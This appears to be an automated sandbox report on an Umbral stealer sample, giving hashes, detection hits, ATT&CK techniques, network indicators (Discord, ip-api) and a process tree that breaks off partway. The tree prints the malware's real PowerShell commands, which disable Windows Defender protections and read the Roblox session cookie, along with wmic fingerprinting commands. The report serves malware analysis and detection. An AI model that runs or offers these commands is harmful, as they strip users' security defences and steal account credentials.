umbral | b9395c6223dd34cdd95dd5c298eb609a806b12f2f2bcf9b0932b47ab564ee591

Analysis

max time kernel
865s
max time network
1165s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2024 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.exe
Size

192KB
MD5

066f7f594bf6f254748bc19562dd1bc3
SHA1

313883f4a7fbfc3c60b153492aeefb927c5d5694
SHA256

9398c6385a5246fe4b86b0f247ddb8a93a9c326389dabef1b96bd65af09b360e
SHA512

04f0c82938dee7a790876ab39282c36eda0c6de11a337d93f728c07be6ff5997605c6a9bba886b94091c313795ee19bf96d65ca9ac1e1d62eeab7acd33b6afca
SSDEEP

6144:i0mlbUZ0lzEhoPkoaHOw4D/dB8H2HSZRw5:0aCESPkpHNi/bX

Score

10^/10

umbral spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000400000001e980-4.dat	family_umbral
behavioral4/memory/3260-13-0x00000233854F0000-0x0000023385530000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Blocklisted process makes network request 13 IoCs

flow	pid	Process
328	2440	Process not Found
708	4660	Process not Found
710	4660	Process not Found
712	4660	Process not Found
726	4016	Process not Found
728	4016	Process not Found
730	4016	Process not Found
749	3816	Process not Found
751	3816	Process not Found
753	3816	Process not Found
785	4660	Process not Found
787	4660	Process not Found
789	4660	Process not Found

Drops file in Drivers directory 49 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NursultanStart.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NursultanStart.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NursultanStart.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NursultanStart.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Process not Found

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Process not Found

Executes dropped EXE 64 IoCs

pid	Process
3260	NursultanStart.exe
2176	start.exe
4988	NursultanStart.exe
4152	start.exe
2668	NursultanStart.exe
5072	start.exe
4252	NursultanStart.exe
760	start.exe
4452	NursultanStart.exe
1632	start.exe
2032	NursultanStart.exe
4804	start.exe
4960	NursultanStart.exe
3936	start.exe
1908	NursultanStart.exe
972	start.exe
3920	NursultanStart.exe
2704	start.exe
384	NursultanStart.exe
2800	start.exe
4768	NursultanStart.exe
4516	start.exe
2964	NursultanStart.exe
2668	start.exe
4328	NursultanStart.exe
4012	start.exe
876	NursultanStart.exe
3784	start.exe
3948	NursultanStart.exe
2600	start.exe
2420	NursultanStart.exe
4468	start.exe
1844	NursultanStart.exe
2680	start.exe
4308	NursultanStart.exe
4600	start.exe
4704	NursultanStart.exe
1264	start.exe
2352	NursultanStart.exe
3600	start.exe
1612	NursultanStart.exe
2496	start.exe
3424	NursultanStart.exe
1596	start.exe
1964	NursultanStart.exe
2968	start.exe
2656	NursultanStart.exe
4720	start.exe
2676	NursultanStart.exe
2680	start.exe
4684	start.exe
5040	NursultanStart.exe
4288	NursultanStart.exe
1796	start.exe
1984	NursultanStart.exe
5024	start.exe
2652	NursultanStart.exe
1232	start.exe
2724	NursultanStart.exe
2512	start.exe
3776	NursultanStart.exe
2464	start.exe
4064	NursultanStart.exe
4052	start.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
3	discord.com
364	discord.com
795	discord.com
711	discord.com
741	discord.com
84	discord.com
270	discord.com
284	discord.com
759	discord.com
794	discord.com
47	discord.com
647	discord.com
626	discord.com
670	discord.com
264	discord.com
402	discord.com
611	discord.com
705	discord.com
374	discord.com
487	discord.com
507	discord.com
789	discord.com
159	discord.com
585	discord.com
627	discord.com
663	discord.com
664	discord.com
729	discord.com
752	discord.com
782	discord.com
490	discord.com
344	discord.com
463	discord.com
649	discord.com
688	discord.com
46	discord.com
681	discord.com
758	discord.com
825	discord.com
132	discord.com
735	discord.com
771	discord.com
657	discord.com
693	discord.com
712	discord.com
753	discord.com
813	discord.com
86	discord.com
464	discord.com
718	discord.com
562	discord.com
563	discord.com
682	discord.com
788	discord.com
180	discord.com
765	discord.com
770	discord.com
531	discord.com
783	discord.com
306	discord.com
687	discord.com
777	discord.com
330	discord.com
801	discord.com

Looks up external IP address via web service 53 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	ip-api.com
358	ip-api.com
482	ip-api.com
400	ip-api.com
804	ip-api.com
703	ip-api.com
756	ip-api.com
810	ip-api.com
230	ip-api.com
259	ip-api.com
525	ip-api.com
121	ip-api.com
153	ip-api.com
336	ip-api.com
715	ip-api.com
792	ip-api.com
673	ip-api.com
822	ip-api.com
77	ip-api.com
300	ip-api.com
744	ip-api.com
762	ip-api.com
816	ip-api.com
661	ip-api.com
667	ip-api.com
685	ip-api.com
622	ip-api.com
641	ip-api.com
697	ip-api.com
733	ip-api.com
279	ip-api.com
459	ip-api.com
554	ip-api.com
503	ip-api.com
580	ip-api.com
721	ip-api.com
327	ip-api.com
655	ip-api.com
679	ip-api.com
709	ip-api.com
750	ip-api.com
786	ip-api.com
176	ip-api.com
727	ip-api.com
691	ip-api.com
739	ip-api.com
370	ip-api.com
447	ip-api.com
602	ip-api.com
798	ip-api.com
768	ip-api.com
774	ip-api.com
780	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 53 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3712	Process not Found
4360	Process not Found
2040	Process not Found
1348	Process not Found
2136	Process not Found
5092	Process not Found
1500	wmic.exe
4520	Process not Found
1948	Process not Found
1540	Process not Found
2804	Process not Found
2404	Process not Found
4960	Process not Found
3620	Process not Found
468	Process not Found
4620	Process not Found
4740	Process not Found
736	Process not Found
4492	wmic.exe
2708	wmic.exe
4268	Process not Found
3140	Process not Found
2396	Process not Found
4056	Process not Found
2404	Process not Found
4348	Process not Found
672	Process not Found
4548	Process not Found
4256	Process not Found
3240	Process not Found
980	Process not Found
1964	Process not Found
1000	Process not Found
4776	Process not Found
4656	Process not Found
3384	Process not Found
2584	Process not Found
2884	Process not Found
4912	Process not Found
3716	Process not Found
3156	Process not Found
4832	Process not Found
2692	Process not Found
4476	Process not Found
2916	Process not Found
3928	Process not Found
1448	wmic.exe
4204	Process not Found
3608	Process not Found
5052	Process not Found
2368	Process not Found
2188	Process not Found
4252	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
920	powershell.exe
920	powershell.exe
872	powershell.exe
872	powershell.exe
560	powershell.exe
560	powershell.exe
560	powershell.exe
2980	powershell.exe
2980	powershell.exe
2980	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4268	powershell.exe
4268	powershell.exe
4268	powershell.exe
3016	powershell.exe
3016	powershell.exe
3016	powershell.exe
3392	powershell.exe
3392	powershell.exe
3392	powershell.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe
4924	powershell.exe
4924	powershell.exe
4924	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1472	powershell.exe
1472	powershell.exe
1472	powershell.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
2520	powershell.exe
2520	powershell.exe
2520	powershell.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
3588	powershell.exe
3588	powershell.exe
3588	powershell.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe
4672	powershell.exe
4672	powershell.exe
4672	powershell.exe
692	Process not Found
692	Process not Found
692	Process not Found
748	Process not Found
748	Process not Found
748	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3260	NursultanStart.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeIncreaseQuotaPrivilege	516	wmic.exe
Token: SeSecurityPrivilege	516	wmic.exe
Token: SeTakeOwnershipPrivilege	516	wmic.exe
Token: SeLoadDriverPrivilege	516	wmic.exe
Token: SeSystemProfilePrivilege	516	wmic.exe
Token: SeSystemtimePrivilege	516	wmic.exe
Token: SeProfSingleProcessPrivilege	516	wmic.exe
Token: SeIncBasePriorityPrivilege	516	wmic.exe
Token: SeCreatePagefilePrivilege	516	wmic.exe
Token: SeBackupPrivilege	516	wmic.exe
Token: SeRestorePrivilege	516	wmic.exe
Token: SeShutdownPrivilege	516	wmic.exe
Token: SeDebugPrivilege	516	wmic.exe
Token: SeSystemEnvironmentPrivilege	516	wmic.exe
Token: SeRemoteShutdownPrivilege	516	wmic.exe
Token: SeUndockPrivilege	516	wmic.exe
Token: SeManageVolumePrivilege	516	wmic.exe
Token: 33	516	wmic.exe
Token: 34	516	wmic.exe
Token: 35	516	wmic.exe
Token: 36	516	wmic.exe
Token: SeIncreaseQuotaPrivilege	516	wmic.exe
Token: SeSecurityPrivilege	516	wmic.exe
Token: SeTakeOwnershipPrivilege	516	wmic.exe
Token: SeLoadDriverPrivilege	516	wmic.exe
Token: SeSystemProfilePrivilege	516	wmic.exe
Token: SeSystemtimePrivilege	516	wmic.exe
Token: SeProfSingleProcessPrivilege	516	wmic.exe
Token: SeIncBasePriorityPrivilege	516	wmic.exe
Token: SeCreatePagefilePrivilege	516	wmic.exe
Token: SeBackupPrivilege	516	wmic.exe
Token: SeRestorePrivilege	516	wmic.exe
Token: SeShutdownPrivilege	516	wmic.exe
Token: SeDebugPrivilege	516	wmic.exe
Token: SeSystemEnvironmentPrivilege	516	wmic.exe
Token: SeRemoteShutdownPrivilege	516	wmic.exe
Token: SeUndockPrivilege	516	wmic.exe
Token: SeManageVolumePrivilege	516	wmic.exe
Token: 33	516	wmic.exe
Token: 34	516	wmic.exe
Token: 35	516	wmic.exe
Token: 36	516	wmic.exe
Token: SeIncreaseQuotaPrivilege	116	wmic.exe
Token: SeSecurityPrivilege	116	wmic.exe
Token: SeTakeOwnershipPrivilege	116	wmic.exe
Token: SeLoadDriverPrivilege	116	wmic.exe
Token: SeSystemProfilePrivilege	116	wmic.exe
Token: SeSystemtimePrivilege	116	wmic.exe
Token: SeProfSingleProcessPrivilege	116	wmic.exe
Token: SeIncBasePriorityPrivilege	116	wmic.exe
Token: SeCreatePagefilePrivilege	116	wmic.exe
Token: SeBackupPrivilege	116	wmic.exe
Token: SeRestorePrivilege	116	wmic.exe
Token: SeShutdownPrivilege	116	wmic.exe
Token: SeDebugPrivilege	116	wmic.exe
Token: SeSystemEnvironmentPrivilege	116	wmic.exe
Token: SeRemoteShutdownPrivilege	116	wmic.exe
Token: SeUndockPrivilege	116	wmic.exe
Token: SeManageVolumePrivilege	116	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 3260	2960	start.exe	91
PID 2960 wrote to memory of 3260	2960	start.exe	91
PID 2960 wrote to memory of 2176	2960	start.exe	92
PID 2960 wrote to memory of 2176	2960	start.exe	92
PID 2960 wrote to memory of 2176	2960	start.exe	92
PID 2176 wrote to memory of 4988	2176	start.exe	93
PID 2176 wrote to memory of 4988	2176	start.exe	93
PID 2176 wrote to memory of 4152	2176	start.exe	94
PID 2176 wrote to memory of 4152	2176	start.exe	94
PID 2176 wrote to memory of 4152	2176	start.exe	94
PID 4152 wrote to memory of 2668	4152	start.exe	121
PID 4152 wrote to memory of 2668	4152	start.exe	121
PID 4152 wrote to memory of 5072	4152	start.exe	96
PID 4152 wrote to memory of 5072	4152	start.exe	96
PID 4152 wrote to memory of 5072	4152	start.exe	96
PID 5072 wrote to memory of 4252	5072	start.exe	188
PID 5072 wrote to memory of 4252	5072	start.exe	188
PID 5072 wrote to memory of 760	5072	start.exe	100
PID 5072 wrote to memory of 760	5072	start.exe	100
PID 5072 wrote to memory of 760	5072	start.exe	100
PID 760 wrote to memory of 4452	760	start.exe	101
PID 760 wrote to memory of 4452	760	start.exe	101
PID 3260 wrote to memory of 920	3260	NursultanStart.exe	102
PID 3260 wrote to memory of 920	3260	NursultanStart.exe	102
PID 760 wrote to memory of 1632	760	start.exe	175
PID 760 wrote to memory of 1632	760	start.exe	175
PID 760 wrote to memory of 1632	760	start.exe	175
PID 1632 wrote to memory of 2032	1632	start.exe	105
PID 1632 wrote to memory of 2032	1632	start.exe	105
PID 1632 wrote to memory of 4804	1632	start.exe	207
PID 1632 wrote to memory of 4804	1632	start.exe	207
PID 1632 wrote to memory of 4804	1632	start.exe	207
PID 4804 wrote to memory of 4960	4804	start.exe	196
PID 4804 wrote to memory of 4960	4804	start.exe	196
PID 4804 wrote to memory of 3936	4804	start.exe	108
PID 4804 wrote to memory of 3936	4804	start.exe	108
PID 4804 wrote to memory of 3936	4804	start.exe	108
PID 3936 wrote to memory of 1908	3936	start.exe	109
PID 3936 wrote to memory of 1908	3936	start.exe	109
PID 3936 wrote to memory of 972	3936	start.exe	110
PID 3936 wrote to memory of 972	3936	start.exe	110
PID 3936 wrote to memory of 972	3936	start.exe	110
PID 972 wrote to memory of 3920	972	start.exe	111
PID 972 wrote to memory of 3920	972	start.exe	111
PID 972 wrote to memory of 2704	972	start.exe	112
PID 972 wrote to memory of 2704	972	start.exe	112
PID 972 wrote to memory of 2704	972	start.exe	112
PID 2704 wrote to memory of 384	2704	start.exe	114
PID 2704 wrote to memory of 384	2704	start.exe	114
PID 2704 wrote to memory of 2800	2704	start.exe	115
PID 2704 wrote to memory of 2800	2704	start.exe	115
PID 2704 wrote to memory of 2800	2704	start.exe	115
PID 3260 wrote to memory of 872	3260	NursultanStart.exe	116
PID 3260 wrote to memory of 872	3260	NursultanStart.exe	116
PID 2800 wrote to memory of 4768	2800	start.exe	118
PID 2800 wrote to memory of 4768	2800	start.exe	118
PID 2800 wrote to memory of 4516	2800	start.exe	119
PID 2800 wrote to memory of 4516	2800	start.exe	119
PID 2800 wrote to memory of 4516	2800	start.exe	119
PID 4516 wrote to memory of 2964	4516	start.exe	120
PID 4516 wrote to memory of 2964	4516	start.exe	120
PID 4516 wrote to memory of 2668	4516	start.exe	121
PID 4516 wrote to memory of 2668	4516	start.exe	121
PID 4516 wrote to memory of 2668	4516	start.exe	121

C:\Users\Admin\AppData\Local\Temp\start.exe
"C:\Users\Admin\AppData\Local\Temp\start.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
  "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:516
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:116
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1632
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4656
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4252
- C:\Users\Admin\AppData\Local\Temp\start.exe
  "C:\Users\Admin\AppData\Local\Temp\start.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
    "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
    3⤵
    - Executes dropped EXE
    PID:4988
- - C:\Users\Admin\AppData\Local\Temp\start.exe
    "C:\Users\Admin\AppData\Local\Temp\start.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
      "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
      4⤵
      Executes dropped EXE
      PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\start.exe
